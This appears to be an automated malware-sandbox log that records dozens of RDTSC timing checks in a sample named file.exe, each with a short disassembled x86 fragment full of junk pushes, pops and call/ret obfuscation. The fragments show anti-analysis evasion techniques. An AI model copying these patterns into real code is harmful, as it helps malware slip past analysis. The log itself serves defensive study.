Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5A490 second address: F5A49D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5A49D second address: F5A4A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5A4A3 second address: F5A4BD instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD714BB3916h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jc 00007FD714BB3916h 0x00000011 pushad 0x00000012 popad 0x00000013 je 00007FD714BB3916h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5A4BD second address: F5A4C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FD714BB0746h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5A659 second address: F5A688 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FD714BB391Dh 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FD714BB3929h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5AAB5 second address: F5AABA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5AABA second address: F5AAC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F51211 second address: F51222 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 je 00007FD714BB0746h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F2860A second address: F2861F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD714BB3921h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F2861F second address: F28629 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD714BB074Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5B890 second address: F5B89A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FD714BB3916h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5B89A second address: F5B89E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5B89E second address: F5B8A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5E6A3 second address: F5E6A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6084E second address: F60854 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F60854 second address: F60859 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F60859 second address: F6086D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD714BB3920h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6086D second address: F6087A instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD714BB0746h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F66569 second address: F66572 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F66572 second address: F66576 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F65E34 second address: F65E3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F65E3A second address: F65E57 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD714BB0746h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jmp 00007FD714BB074Fh 0x00000010 push eax 0x00000011 pop eax 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F65E57 second address: F65E85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD714BB391Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007FD714BB3928h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F65E85 second address: F65E8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F66147 second address: F6614B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F66403 second address: F66409 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F69160 second address: F69183 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD714BB3929h 0x00000009 jnc 00007FD714BB3916h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6DA99 second address: F6DA9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6DB9C second address: F6DBA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FD714BB3916h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6DBA6 second address: F6DBAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6DCF6 second address: F6DD08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b je 00007FD714BB3916h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6DEFE second address: F6DF04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6DF04 second address: F6DF08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6E1A3 second address: F6E1C9 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD714BB0748h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD714BB0757h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6E659 second address: F6E65D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6E844 second address: F6E848 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6E848 second address: F6E84E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6EC9C second address: F6ECA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6ECA2 second address: F6ECD8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007FD714BB3918h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 0000001Ah 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 xchg eax, ebx 0x00000024 push eax 0x00000025 push edx 0x00000026 jl 00007FD714BB391Ch 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6ECD8 second address: F6ECDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6ECDC second address: F6ECED instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD714BB3918h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6F1BF second address: F6F1C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6F1C3 second address: F6F1E5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007FD714BB391Ch 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 je 00007FD714BB391Ch 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6FB88 second address: F6FBA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD714BB0750h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F757C5 second address: F757CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F703BB second address: F703CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007FD714BB074Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F77D3F second address: F77D4B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F79989 second address: F7998F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7998F second address: F79995 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F79995 second address: F79A27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007FD714BB0748h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 0000001Ah 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 and si, 4F04h 0x0000002a jc 00007FD714BB074Ah 0x00000030 push esi 0x00000031 push edi 0x00000032 pop esi 0x00000033 pop esi 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push esi 0x00000039 call 00007FD714BB0748h 0x0000003e pop esi 0x0000003f mov dword ptr [esp+04h], esi 0x00000043 add dword ptr [esp+04h], 0000001Bh 0x0000004b inc esi 0x0000004c push esi 0x0000004d ret 0x0000004e pop esi 0x0000004f ret 0x00000050 jmp 00007FD714BB0756h 0x00000055 mov esi, dword ptr [ebp+122D2814h] 0x0000005b push 00000000h 0x0000005d push edx 0x0000005e or edi, 6005D757h 0x00000064 pop edi 0x00000065 push eax 0x00000066 push eax 0x00000067 push edx 0x00000068 push ebx 0x00000069 jnl 00007FD714BB0746h 0x0000006f pop ebx 0x00000070 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7608A second address: F76096 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F76B6A second address: F76B6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F78C42 second address: F78C48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F78C48 second address: F78C4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7BF06 second address: F7BF63 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD714BB3918h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f pushad 0x00000010 mov dword ptr [ebp+122D189Ch], ebx 0x00000016 mov esi, dword ptr [ebp+122D2A80h] 0x0000001c popad 0x0000001d push 00000000h 0x0000001f push eax 0x00000020 mov di, 3D00h 0x00000024 pop edi 0x00000025 push 00000000h 0x00000027 mov bh, 06h 0x00000029 xchg eax, esi 0x0000002a pushad 0x0000002b jng 00007FD714BB391Ch 0x00000031 jns 00007FD714BB3916h 0x00000037 pushad 0x00000038 jmp 00007FD714BB391Bh 0x0000003d jmp 00007FD714BB3922h 0x00000042 popad 0x00000043 popad 0x00000044 push eax 0x00000045 pushad 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F78C4C second address: F78C5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F78C5A second address: F78C61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F78C61 second address: F78C66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7CE7A second address: F7CF20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 jmp 00007FD714BB391Ah 0x0000000b nop 0x0000000c mov dword ptr [ebp+122D2C85h], edi 0x00000012 push edi 0x00000013 jno 00007FD714BB3917h 0x00000019 pop edi 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push edx 0x0000001f call 00007FD714BB3918h 0x00000024 pop edx 0x00000025 mov dword ptr [esp+04h], edx 0x00000029 add dword ptr [esp+04h], 0000001Ah 0x00000031 inc edx 0x00000032 push edx 0x00000033 ret 0x00000034 pop edx 0x00000035 ret 0x00000036 mov ebx, esi 0x00000038 mov dword ptr [ebp+122D30D0h], ecx 0x0000003e mov edi, dword ptr [ebp+122D19FBh] 0x00000044 push 00000000h 0x00000046 push 00000000h 0x00000048 push edi 0x00000049 call 00007FD714BB3918h 0x0000004e pop edi 0x0000004f mov dword ptr [esp+04h], edi 0x00000053 add dword ptr [esp+04h], 0000001Ah 0x0000005b inc edi 0x0000005c push edi 0x0000005d ret 0x0000005e pop edi 0x0000005f ret 0x00000060 push ecx 0x00000061 ja 00007FD714BB392Eh 0x00000067 pop edi 0x00000068 xchg eax, esi 0x00000069 push eax 0x0000006a push edx 0x0000006b jmp 00007FD714BB391Dh 0x00000070 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7CF20 second address: F7CF48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD714BB0759h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007FD714BB0748h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7A1A4 second address: F7A1AE instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD714BB3916h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7C087 second address: F7C08C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7E205 second address: F7E20B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7A1AE second address: F7A1C0 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD714BB0748h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7F06D second address: F7F08A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD714BB3928h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7C08C second address: F7C132 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD714BB0748h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007FD714BB0748h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 00000014h 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 mov dword ptr [ebp+122D1903h], esi 0x0000002d mov dword ptr [ebp+122D2C6Fh], edi 0x00000033 push dword ptr fs:[00000000h] 0x0000003a push 00000000h 0x0000003c push edi 0x0000003d call 00007FD714BB0748h 0x00000042 pop edi 0x00000043 mov dword ptr [esp+04h], edi 0x00000047 add dword ptr [esp+04h], 0000001Bh 0x0000004f inc edi 0x00000050 push edi 0x00000051 ret 0x00000052 pop edi 0x00000053 ret 0x00000054 mov dword ptr fs:[00000000h], esp 0x0000005b mov bx, di 0x0000005e mov eax, dword ptr [ebp+122D0CDDh] 0x00000064 push ecx 0x00000065 movzx ebx, di 0x00000068 pop ebx 0x00000069 push FFFFFFFFh 0x0000006b call 00007FD714BB0753h 0x00000070 push edx 0x00000071 mov bx, si 0x00000074 pop ebx 0x00000075 pop ebx 0x00000076 mov ebx, dword ptr [ebp+122D2950h] 0x0000007c nop 0x0000007d jl 00007FD714BB0752h 0x00000083 jbe 00007FD714BB074Ch 0x00000089 push eax 0x0000008a push edx 0x0000008b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7A1C0 second address: F7A1C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7A1C7 second address: F7A1CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7FF8F second address: F7FF94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7FF94 second address: F7FFA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD714BB074Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F81018 second address: F8101C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8101C second address: F8105A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 add edi, dword ptr [ebp+122D288Ch] 0x0000000e push 00000000h 0x00000010 sub dword ptr [ebp+12482452h], esi 0x00000016 mov ebx, ecx 0x00000018 push 00000000h 0x0000001a jmp 00007FD714BB0757h 0x0000001f xchg eax, esi 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FD714BB074Ah 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F82E1E second address: F82EBE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FD714BB3918h 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007FD714BB3918h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 00000016h 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a mov dword ptr [ebp+122D2CD7h], esi 0x00000030 push 00000000h 0x00000032 mov dword ptr [ebp+12475408h], edx 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push ebx 0x0000003d call 00007FD714BB3918h 0x00000042 pop ebx 0x00000043 mov dword ptr [esp+04h], ebx 0x00000047 add dword ptr [esp+04h], 00000017h 0x0000004f inc ebx 0x00000050 push ebx 0x00000051 ret 0x00000052 pop ebx 0x00000053 ret 0x00000054 jc 00007FD714BB391Ch 0x0000005a mov dword ptr [ebp+122D313Bh], edx 0x00000060 xchg eax, esi 0x00000061 jmp 00007FD714BB3926h 0x00000066 push eax 0x00000067 push eax 0x00000068 push edx 0x00000069 push eax 0x0000006a push edx 0x0000006b jmp 00007FD714BB3929h 0x00000070 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F82EBE second address: F82ED3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD714BB0751h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7F1FD second address: F7F207 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD714BB391Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F80172 second address: F80228 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD714BB074Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FD714BB0752h 0x0000000f nop 0x00000010 pushad 0x00000011 push esi 0x00000012 jmp 00007FD714BB0757h 0x00000017 pop ebx 0x00000018 mov esi, ecx 0x0000001a popad 0x0000001b push dword ptr fs:[00000000h] 0x00000022 mov edi, dword ptr [ebp+12457E6Bh] 0x00000028 mov dword ptr fs:[00000000h], esp 0x0000002f mov ebx, dword ptr [ebp+122D29CCh] 0x00000035 mov eax, dword ptr [ebp+122D0561h] 0x0000003b jo 00007FD714BB074Ch 0x00000041 mov edi, dword ptr [ebp+122D28A0h] 0x00000047 push FFFFFFFFh 0x00000049 add bx, 6026h 0x0000004e nop 0x0000004f pushad 0x00000050 pushad 0x00000051 jmp 00007FD714BB0757h 0x00000056 push ebx 0x00000057 pop ebx 0x00000058 popad 0x00000059 push ecx 0x0000005a jmp 00007FD714BB0750h 0x0000005f pop ecx 0x00000060 popad 0x00000061 push eax 0x00000062 js 00007FD714BB0767h 0x00000068 push eax 0x00000069 push edx 0x0000006a ja 00007FD714BB0746h 0x00000070 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F83EA3 second address: F83EA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F83EA7 second address: F83F60 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD714BB074Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FD714BB0758h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007FD714BB0748h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 00000016h 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b pushad 0x0000002c push ecx 0x0000002d sub bx, DB70h 0x00000032 pop esi 0x00000033 jmp 00007FD714BB074Fh 0x00000038 popad 0x00000039 push 00000000h 0x0000003b mov edi, 7668CE66h 0x00000040 mov di, dx 0x00000043 push 00000000h 0x00000045 push 00000000h 0x00000047 push edi 0x00000048 call 00007FD714BB0748h 0x0000004d pop edi 0x0000004e mov dword ptr [esp+04h], edi 0x00000052 add dword ptr [esp+04h], 0000001Ch 0x0000005a inc edi 0x0000005b push edi 0x0000005c ret 0x0000005d pop edi 0x0000005e ret 0x0000005f xchg eax, esi 0x00000060 jmp 00007FD714BB0751h 0x00000065 push eax 0x00000066 push eax 0x00000067 push edx 0x00000068 jmp 00007FD714BB0754h 0x0000006d rdtsc
